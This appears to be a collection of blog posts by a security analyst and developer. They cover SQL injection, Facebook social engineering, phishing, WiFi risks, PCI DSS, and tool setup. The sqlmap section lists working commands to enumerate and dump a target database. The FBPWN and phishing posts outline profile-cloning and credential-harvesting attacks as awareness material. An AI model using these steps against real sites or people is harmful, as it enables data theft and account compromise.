Simple SQL Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

There are two complementary and successful methods of mitigating SQL Injection attacks:
Parameterized queries using bound, typed parameters
Careful use of parameterized stored procedures.
Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
Java
.NET
Perl
PHP
Coldfuion

The above video demonstrates a sucsessful sql injection attack using sqlMap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It can be found at http://sqlmap.sourceforge.net

Simple steps used in video example:
### see if the page is injectiable

1. './sqlmap.py -u http://yoursitehere.com/vulnerablefile'

### get database names

2. './sqlmap.py -u http://yoursitehere.com/vulnerablefile --dbs'

### get table names
3. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename --tables'

### get column names
4. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename --columns'

### get the data
'./sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename -C colum1, column2 --dump'

Another Facebook Attack

You may be a champ at Mafia Wars and Farmville, but what do you know about the security risks of social media sites? "Risk awareness is where it all starts!

For example. Think about when you first created your log in with your bank or email. Common security questions are what town did you grow up in, what street, mother's maiden name, your high school, favorite teacher etc... how much of that information is on your social media sites?  Now how many friends / relatives have talked about new banking fees etc.. and you offer up your two cents with "I've been using ABC Bank forever". With a little digging its not to hard to get your information as well as your friends and family. In most cases just cloning your page is enough to get your friends to accept friend request from a cloned account and then in turn giving up all the info needed to attack them, their friends and family.

How common are scams and hacks on social networks?
In 2009, Facebook officials announced they had surpassed 300 million users. Twitter claims to have 6 million unique monthly visitors and 55 million monthly visitors. With that kind of reach, it's not surprising that criminals view these sites as a great venue for finding victims. As a result, security stories about Twitter and Facebook have dominated the headlines in the past 12 months. In one high-profile story from 2009, hackers managed to hijack the Twitter accounts of more than 30 celebrities and organizations, including President Barack Obama and Britney Spears (See: Hackers Hijack Obama's, Britney's Twitter Accounts. 

The above video is an example of FBPWN being used to gather information from a Facebook account. FBPWN is a cross-platform Java based Facebook social engineering framework, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder. Extensible module interfaces and built-in modules for advanced social engineering tricks.

A typical hacking scenario starts with gathering information from a user's FB profile. The plugins are just a series of normal operations on FB, automated to increase the chance of you getting the info.

Typically, first you create a new blank account for the purpose of the test. Then, the friending plugin works first, by adding all the friends of the victim (to have some common friends). Then the clonning plugin asks you to choose one of the victims friends. The cloning plugin clones only the display picture and the display name of the chosen friend of victim and set it to the authenticated account. Afterwards, a friend request is sent to the victim's account. The dumper polls waiting for the friend to accept. As soon as the victim accepts the friend request, the dumper starts to save all accessable HTML pages (info, images, tags, ...etc) for offline examining.

http://code.google.com/p/fbpwn/

Social Engineering and Online Hacking

I here it far too often, complete with that infernal cry of pain. "My Facebook (put whatever page you log into here) got hacked".

It may be your favorite social media site, your bank or credit card log in screen, You got there by clicking a link that someone sent to your email, or on that new cool site you found that lets you download free music. You reached that all too familiar screen that looks just like it always does, you log in and blip your log in didn't work try again, however you just gave up your log in credentials without even realizing it.

How did my Facebook get hacked?

Step One: Hacker will clone your favorite log in page: (No special tools needed, open up your favorite page in IE and go to file, click save page and walla you have it.)

Step Two: Hacker sets up the page on his or her server, compete with a database back-end to collect results and a phony sub-domain to make it look even better ( http://facebook.freeserver.com )

Step Three:Hacker will get you to his phony domain by sending you the link in an email, IM, or even posted on another site. Maybe he or she already hacked one of your friends and you think it's your favorite aunt sending you the "check out the cool new app" link. Let's take a quick poll how many of your friends or relatives could of clicked on a link someone they don't know sent them?

Step Four:Hacker uses your log in credentials to hack your friends, your accounts, whatever he or she wants. You have been compromised and a week from now you realize you just transferred all you funds in your bank account to an overseas account.

Moral of the story: Don't be lazy, always type the web address in, and remember your probably smarter then most of your friends so don't just click on some silly link they sent you.

Public WiFi Not as Free as You Think!

We all love the convenience of WiFi to stay connected anywhere our laptops, tablets, and smart phones take us. We connect at airports, coffee shops, libraries, restaurants, and the slew of other available access points. Taking a look at http://www.wififreespot.com gives thousands of locations to connect for free across the country.

To bring up an old quote "You get what you pay for", When accessing a public WiFi security system it is important to understand any security issues. Specifically, a public WiFi system is often free and therefore is cheaply provided and public WiFi security is minimal. Therefore, it is safe to assume that any safety measures are non existent. Subsequently, when the consumer uses the public WiFi site their personal and confidential information transmitted over the Internet maybe at risk of being stolen.

You never know what might be lurking out there. The bad guys have all kinds of tools at their disposal, and all of them are used to find information that they can steal from you it’s important to know what you might be up against.

According to a 2010 report by Trustwave SpiderLabs, consumers’credit cards are more likely to be hacked in a hotel than in any other place they are used. Thirty-eight percent of the hacking incidents that Trustwave investigated last year occurred in hotel credit card systems.

In 2010, the Wyndham Hotels and Resorts – operators of The Days Inn, Ramada and Howard Johnson Hotel chains – reported that their networks had been compromised by hackers. The loot: An unknown number of guest names and credit card numbers.

Packet sniffers - These programs allow the interception of wireless transmissions via data packets. Packets are the form in which data is organized and sent across networks. If the packets are unencrypted, someone with a packet sniffer can see the information as plain text. That means your passwords, credit card numbers, and other information can be picked up and used by someone else.

Decoding Tools - Even "secure" hot spots can leave you exposed. Tools for decoding encrypted wireless communications are easily found and allow hackers to crack encryption keys. That means you still need to be on guard when you visit a hot spot that provides each visitor with passwords or other signs of secured networks.

Evil Twin or Wi-phishing - As with ordinary phishing, wi-phishing puts your identity in danger. Wi-phishing, or The Evil Twin, is a popular ruse in which criminals spoof wireless networks to deceive people like you into divulging confidential information by setting up a fake hot spot that you might innocently log into. This "evil twin" is ready to steal passwords, financial information, or whatever else you might be transmitting. Here's how it might work: Your coffee shop (or anywhere else you may be) uses a wireless service provider that charges a connection fee. To connect, you must provide a credit card number and certain personal information. In a wi-phishing scam, someone pre-empts the hot spot's wireless signal with one of his own by creating a "dummy" network that contains the name of the airline, hotel or coffee shop, replacing the sign-up page with a fake look-alike. You end up supplying your information to the spoofer, not the real hot spot provider. Once you're on the spoofed hot spot, you may be redirected to other fraudulent pages. The bottom line is that you’ve just given your credit card information to a phony site.

Below are some key steps to protecting your computer from intrusion:

Watch out for fake WiFi access points designed to look just like real hotel WiFi networks. These “Evin Twins” may even contain your hotel’s name. Check with the establishment to get the correct name.

Find out whether your hotel’s wireless network uses WPA (WiFi Protected Access) security. WPA usually requires a password to get onto the network and always encrypts everything sent over wireless. This prevents eavesdropping over wireless – but it may not stop other guests connected to the same hotspot from stealing your data.

Always assume you’re not alone on any public WiFi network. Disable file sharing, turn on your computer’s personal firewall, and never send Social Security numbers, passwords or financial information when using an unencrypted wireless connection.

When using a free hotspot, you could be sending data through someone you don’t know. When using a commercial hotspot, never supply payment information to an unsecured hotspot login page. If your web browser does not display a green padlock or it warns that the login page may not be secure, use a different hotspot.

Use a VPN (virtual private network) to make all the information transmitted over your WiFi connection invisible to hackers.
      

Computer Virus giving you the BLUES? Some tips might help.

Caught A Virus?

If you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.


Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2007, 2008, and 2009. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.

It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.

For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."

Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.

Is Your PC "Owned?"

I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there's nothing that you need to worry about, include:

* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.
* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.

I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.

Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.

If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.

What to Do Next

Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.
* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAffee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.

A Microgram of Prevention

Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro's PC-Cillin, which you can buy for $50.

Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."

Here are a few more pointers for a virus-free life:

* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.

If you are not yet PCI compliant get there now.

If you are a Payment Card Merchant and are not yet PCI DSS compliant, take notice. It could end up being one of the biggest cost in penalties your company could incur.

High-status cases concerning big corporations have hit the headlines in the last couple of years. The Payment Card Industry has threatened huge fines against some larger merchants of up to $25,000 per month until compliance is obtained. In the high-profile case of TJX (owner of T.J. Maxx, Marshalls, Home Goods and A.J. Wright retail chains), the company reported spending $202 million because of the PCI violation that compromised the card-holder account information of as many as 40 million customers. The money is being spent to handle more 20 lawsuits brought against it by banks and consumers in the U.S. and Canada and to pay settlements with credit-card associations. I don't see how the smaller business owner can gamble with the penalties for non-compliance.

If you are one of these businesses and are not yet compliant, you are constantly at risk of losing sensitive card-holder data, which will most likely result in PCI DSS fines, legal action and bad publicity. Organizations that fail to comply face fines of up to $500,000 if the data is lost or stolen and risk not being allowed to handle card-holder data. Theft of sensitive information such as credit card information come from not only external threats but insider threats as well. The PCI Security Standards Council website provides a wealth of information for understanding and navigating the PCI DSS. User forums such as the LinkedIn PCI DSS Compliance Specialist and vendor blogs and websites are also good sources of free information.

Is PCI compliance a law? The short answer is no. The long answer is that while it is not currently a federal law, there are state laws that are already in effect (and some that may go into effect) to force components of the PCI Data Security Standard (PCI DSS) into law. In addition, there is a big push by legislatures and industry trade association to enact a federal law around data security and breach notification.

While the credit card companies may have ZERO legal authority to levy fines on any business, all the merchant card agreements, I’ve read include a clause where the merchant agrees to pay all fines from the card brand that were incurred by the bank, check your merchant agreements small print.

Taking a look at the Visa, Inc.'s agreement it states "PCI DSS compliance is required of all entities that store, process, or transmit Visa cardholder data, including financial institutions, merchants and service providers. The PCI DSS applies to all payment channels, including retail (brick-and-mortar), mail/telephone order, ande-commerce. Visa Inc.'s compliance programs manage compliance with the PCI DSS with the required program validation."

PCI DSS has created and imposed a comprehensive list of standard requirements which companies are to adhere to in order to ensure that the account data of all customers is protected. Essentially, if your organization processes any form of credit card information during your business practices then your company should be compliant to the PCI DSS standards.

My OS, IDE, and Tools of the Trade

Working as an Application Security Analyst as well as a being a custom Application Developer requires a unique set up for me. So starting with the OS, most of my security tools are Linux based or for me seem to run better on a Linux OS, (Nessues, nMap, Nikto, John The Ripper, Hydra) so BackTrack is my Operating System of Choice. I do have a Virtual Windows Machine for the occasions where I may need a Microsoft program such as Brutus or Adobe's CS5 but find myself rarely cranking it up. On that note being a Flex developer, Adobe deciding to no longer support Flex / Flash builder on Linux was a big downside. Also of note is deciding on a way to connect to Microsoft SQL servers during development.

With Backtrack covering most of my Security tools, I threw in my favorite browser Chrome, as well as Open-office Suite and xPDF to cover reporting,  and opening Microsoft Office Files, and I added the sun Java install.

For Java, PHP, Coldfusion, and Flex Development start with XAMPP  and ColdFusion  server installs and Eclipse has me covered with a few plugins for coding. I start with the PHP Helios version of Eclipse located here,  the benefit it has all the tools already installed for my PHP and Java development, I have added the following Plug-ins to complete the install:

QuantumDB  - allows me to connect to several DBMS including DB2, Oracle, msSql, & mySql
CFEclipse  - Handles my ColdFusion development
SubClipse  - svn check in and checkout (there are several version control plug ins for different systems including Perforce, and VSS just look around for the one you need)
fbForLinux  - Takes care of my flex development on Linux works great and allows me to do air development as well (no design view).
Adobe Air for Linux  - This will allow me to install the Design View Air Application for flex. I rarely use it coming from a hand coding background, but sometimes it is nice to see your flex application in design view.

A few wine programs I install:
SqlYog - Although for the most part I stick with Quantum plug-in for database development from time to time I do use sqlYog for mySql development runs fine with wine.
ScreenCalipers  - need to see some sizes this works great
fsCapture  - there may be better Linux equivalents I'm just used to using this one


For Backtrack5 you may want to add the Ubuntu software center for other apps you may want in terminal type [ apt-get install software-center ]

That about covers my basic set up. I keep a Live CD with the above already installed so when I need to set up a new machine I have a quick start.

http://www.wiredwizard.net

5 Tips for Social Media Marketing

Facebook, Twitter, LinkedIn, MySpace, and the list goes on and on seomoz has a list of the top 25 social media marketing sites at http://www.seomoz.org/article/social-media-marketing-tactics .

In 2009, the population of Facebook surpassed that of the U.S.A. In just over two years, it is now double the population of the US. If Facebook were a nation, they would be the 3rd largest in the world.

The impact of this on marketing through Social Media management is staggering. Big corporations are quickly catching on to the power of Social Media Marketing, which includes Twitter marketing. For the first time, in 2010, ending a 23 year run, Pepsi Cola pulled out of advertising in the Super Bowl ditching it for Social Media.

The phenomenal growth of Social Media (texting, blogging, networking)has the attention of every major company. Social Media Management has become an essential component in today’s business, So how do you leverage the power of Social Media for your company.

The Days of Build it and they will come are long gone, Here are a few tips for your SMO efforts.

1.    Avoid Spam.

The first social media marketing rule that you should remember is to avoid SPAM as much as possible. The best way to be successful with social media marketing is to not expose your website to your targeted marketing by spamming. But it's rather the opposite: building effective relationships and leveraging them in the long run.

2.    Don’t leave any social media profiles unattended.

Active participation is a basic necessity of any social media marketing campaign. Just creating some profiles in a handful of social media sites doesn’t do any good. You should post some content to the social media profiles frequently and make them look lively.

3.    Be transparent, honest, relevant, committed and value minded.

You need to build trust and loyalty with your audience. Offer suggestions, provide feedback and answer specific questions. Furthermore, do not always try to sell to them. Try to understand the need of the consumer instead of forcing yourself on your customer. Your customers want to connect with the real people behind the company and know what you are doing and planning to do

4. Seek input as well as putting out your messages.

Spend some time asking people what they want, or what they would like to know. Get to know your markets needs. Follow up answer their questions, reply to comments, be proactive.

5. Use the tools the Social Media Sites have already given you.

Take advantage on the extra applications that can be added to your page. You can add a button to share site with their friends, create events and giveaways, create fanpages, etc. Explore all the tools each of the Social Media sites offer.


Be imaginative and interactive, think about hiring some help to get your Social Media efforts kicked off right. Build relationships and they will come.


http://www.wiredwizard.net

How does PCI-DSS Compliance affect your on-line efforts?

Pr-Internet when you thought of a store being robbed you pictured the masked bandit with a gun standing in front of the cashier demanding the drawer, or maybe a more optimistic view of a shoplifter, or a shady employee dropping merchandise outthe back door, my how times have changed.

Enter todays modern Cyber-Thieves, they operate in stealth from behind the anonymous veil of their computer screen. No longer the masked bandit with a gun and a bad upbringing, now it could be a board teen with a new hacking script, a grandmother who learned a trick from the kids to get a discount in a form order, the 35 year old laid off white collar developer that found out he could sell credit-card numbers or even just sales leads with his IRC account, add too them the countless number of other Cyber-Thief profiles.

They attack small to big companies, municipalities, churches, etc... looking for any identity information, Credit-Card information, as well as other relative information that may get them into additional resources that might provide them with the information they can use.

In 2009 One of the victims of the cybercrime, the Catholic Diocese in Des Moines, Iowa, lost about $680,000.The church is puzzled how the cyber criminals entered the church accounts but the thieves "took all they could" before bank officials realized what had transpired in just two days.

“No one country, no one company, andno one agency can stop cybercrime,” said FBI Director Robert S.Mueller III, in an agency statement. “The only way to do that is by standing together. For ultimately, we all face the same threat.Together, the FBI and its international partners can and will find better ways to safeguard our systems, minimize these attacks, and stop those who would do us harm. So how does the small on-line merchant help with this effort? Enter PCI Compliance.

According to Verizon Business and theU.S. Secret Service payment card data theft make up more than half ofall data breaches investigated and has hit organizations of allsizes. From Mom and Pop on-line shops where there is rarely an ITbudget for security (What better target could there be), to largecorporations that process billions of dollars in on-line credit-cardsales.

One source that merchants can used as a guide is the Payment Card Industry Data Security Standard (PCI), which is the minimum security the credit card brands expect from a merchant who accepts credit cards. The current standard can be found at The https://www.pcisecuritystandards.org/.

In PCI, a merchant can find several security measures designed todeter hackers from attempting to steal their credit card data. Evenif a mom-and-pop restaurant cannot meet all PCI standards, it wouldbe better to implement the security measures that are practical today, than to ignore the problem altogether.

PCI DSS is the core standard for Merchants and processors. It addresses security technology controlsand processes for protecting card-holder data. If your organizationaccepts just one card for payment on-line you must comply with PCI DSS. Validation of compliance is done annually by an external Qualified Security Assessor (QSA) for organizations handling largevolumes of transactions, or by Self-Assessment Questionnaire (SAQ) for companies handling smaller volumes.

Although PCI DSS requirements must beimplemented by all entities that process, store or transmit account data, formal validation of PCI DSS compliance is not mandatory for all entities. Currently both Visa and Mastercard require Merchantsand Service Providers to be validated according to the PCI DSS

The six Control Objectives:

Build and Maintain a Secure Network

• Install and maintain a firewallconfiguration to protect card-holder data
• Do not use vendor-supplied defaultsfor system passwords and other security parameters

Protect Cardholder Data

• Protect stored card-holder data
• Encrypt transmission of card-holderdata across open, public network

Maintain a Vulnerability ManagementProgram

• Use and regularly update anti-virussoftware on all systems commonly affected by malware
• Develop and maintain secure systemsand applications

Implement Strong Access ControlMeasures

• Restrict access to card-holder databy business need-to-know
• Assign a unique ID to each personwith computer access
• Restrict physical access tocard-holder data

Regularly Monitor and Test Networks

• Track and monitor all access tonetwork resources and card-holder data
• Regularly test security systems andprocesses

Maintain an Information Security Policy

• Maintain a policy that addressesinformation security

PCI Compliance Help For SmallBusiness that are limited on their IT Security Bugdet

In order to find out if your businessis PCI compliant, the first and most crucial step is to complete a PCI Self-Assessment Questionnaire. By following this process, you will determine whether your business is compliant. If not, there are established steps you can take to achieve regulatory compliance. Please feel free to contact me if you need information or help withthe PCI Self-Assessment Questionnaire.

OpenVAS

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 20,000 in total (as of January 2011).

All OpenVAS products are Free Software. Most components are licensed under the GNU General Public License (GNU GPL).


Starting OpenVAS with greenbone security desktop as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then from the menu

Start Greenbone Security Desktop

and login

You are now ready to setup your scanning tasks.
Starting OpenVAS with a web browser as the scanning interface

From the menu select

Openvas NVT sync

Start Openvas scanner

then in a terminal window

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then open your browser to the address

http://127.0.0.1:9392

Chrome on Backtrack 5

So you got Backtrack installed and now you want to be able to get Chrome to run as root. The below steps will walk you through installing the Chromium browser and running it as root. The steps can be modified to run the latest Chrome as well as other applications that will not run as root such as VLC. Just make modifications where necessary.


FYI: Chromium is the bleeding edge development of the Google browser project. It is the browser, and whatever its current state may be they usually get a few Chromium builds per day.


Google Chrome is simply a "rebranding" of Chromium, but is a little more ready for public consumption.



Steps:

First lets install Chrome open terminal:

[apt-get install chromium-browser]

now change to the chrome directory

[cd /usr/lib/chromium-browser]

now open hex editor and change to ascii

[hexedit chromium-browser]
[tab]

now search for geteuid

[ctrl s geteuid]

change to getppid and save

[getppid ctrl x]

now chrome will run

Adding start up to linux

On the list of things to do after an install of SVN was to get Ubuntu to start the service at boot. This procedure will work for almost anything you’d like to do at boot.

Step 1 – Create your script.
Simply create a new file (I called mine startsvn) and type the command you’d like to run

cd /etc/init.d/
sudo touch startsvn
sudo vi startsvn
svnserve -d -r /usr/local/svn/repository_name

Step 2 – Save the script in the /etc/init.d/ folder

Step 3 – Make the script executable
sudo chmod +x startsvn

Step 4 – Add the script to the boot sequence
sudo update-rc.d startsvn defaults

Another example say you want to start up your ColdFusion server at boot

Step 1 create a link to your coldfusion script
sudo ln -s /opt/coldfusion9/bin/coldfusion /etc/init.d/coldfusion

Step 2 update the boot sequence
sudo update-rc.d coldfusion defaults